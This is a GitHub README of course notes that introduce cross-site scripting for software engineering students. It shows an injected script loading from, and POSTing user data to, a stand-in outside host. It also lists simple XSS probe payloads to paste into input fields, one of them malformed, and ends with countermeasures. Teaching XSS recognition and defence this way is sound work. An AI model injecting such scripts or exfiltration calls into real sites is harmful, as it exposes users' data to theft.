Skip to content

Latest commit

 

History

History
54 lines (42 loc) · 2.8 KB

README.md

File metadata and controls

54 lines (42 loc) · 2.8 KB
Raw

Cross Site Scripting (XSS)

Cross-site scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Software Engineering Course Specifications

"Cross-site scripting (XSS) involves injecting malicious code into an otherwise safe website. It is usually done through user input that is not sufficiently sanitised before being processed and stored on the server.
Students should be able to interpret fragments of JavaScript related to cross-site scripting."

Either the malicious code was inserted into the code base because it was accidentally inserted without code reviews or an internal threat actor has intentionally inserted it, or an SQL/XXS code injection vulnerability has been exploited to insert it. Students should be able to identify that an script referring to a foreign context has been executed or that a POST request has been made to an unknown URL.

<html>
  <head>
    <title>Welcome to yourWebsite</title>
    <link href="http://yourwebsite.com/favicon.png" />
  </head>
  <body>
    <h1>Your Website</h1>
    <script src="http://www.randomUrl.com/danger.js"></script>

    or

    <script>
      const response = fetch("http://www.randomUrl.com", {
        method: "POST",
        headers: {
          "Content-Type": "application/json; charset=UTF-8",
        },
        body: JSON.stringify(yourData),
      });
    </script>
  </body>
</html>

How to penetrate test for this vulnerability

To use these scripts, paste them into any input boxes or after the URL in the browser address bar and see what gets executed or saved to the HTML.

  • <script>alert(1)</script>
  • <img src=x onload(alert(1))>
  • <svg onload=alert(1)>
  • <iframe src="javascript:alert(1)"></iframe>

How to countermeasure this vulnerability

  1. Regular code reviews
  2. Only known and secure third-party libraries should be externally linked. Preferably, after a code review, third-party libraries should be locally served.
  3. Monitor 3rd party libraries for known vulnerabilities and, on discovery, patch the vulnerabilities.
  4. Implement Defensive data handling.
  5. Declare the language <html lang="en">.
  6. Declare charset <meta charset="utf-8">.
  7. Implement a Content Security Policy (CSP) Blocking <SVG> and <SCRIPT> tags.